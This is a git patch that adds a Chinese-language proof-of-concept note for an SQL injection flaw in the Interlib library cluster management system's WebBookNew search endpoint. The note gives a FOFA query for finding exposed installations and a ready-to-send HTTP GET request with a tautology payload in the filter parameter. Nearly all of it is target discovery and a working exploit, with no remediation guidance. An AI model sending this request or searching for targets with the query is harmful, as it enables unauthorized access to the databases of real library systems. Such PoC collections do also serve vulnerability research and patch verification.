From a069d1989038cddf0d133a5c1b50a986a675bfee Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 30 Apr 2024 12:31:44 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=B9=BF=E5=B7=9E=E5=9B=BE=E4=B9=A6?= =?UTF-8?q?=E9=A6=86=E9=9B=86=E7=BE=A4=E7=B3=BB=E7=BB=9FWebBookNew?= =?UTF-8?q?=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...图书馆集群系统WebBookNew存在SQL注入漏洞.md | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 广州图书馆集群系统WebBookNew存在SQL注入漏洞.md diff --git a/广州图书馆集群系统WebBookNew存在SQL注入漏洞.md b/广州图书馆集群系统WebBookNew存在SQL注入漏洞.md new file mode 100644 index 0000000..72ddbad --- /dev/null +++ b/广州图书馆集群系统WebBookNew存在SQL注入漏洞.md @@ -0,0 +1,20 @@ +## 广州图书馆集群系统WebBookNew存在SQL注入漏洞 + +图创图书馆集群管理系统/interlib/websearch/WebBookNew存在SQL注入漏洞,攻击者可利用漏洞获取数据库敏感信息 + +## fofa +``` +body="interlib" +``` + +## poc +``` +GET /interlib/websearch/WebBookNew?cmdACT=search_BookNew&showpage=1&filter=''+or+1=1--+ HTTP/1.1 +Host: {{Hostname}} +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Upgrade-Insecure-Requests: 1 +```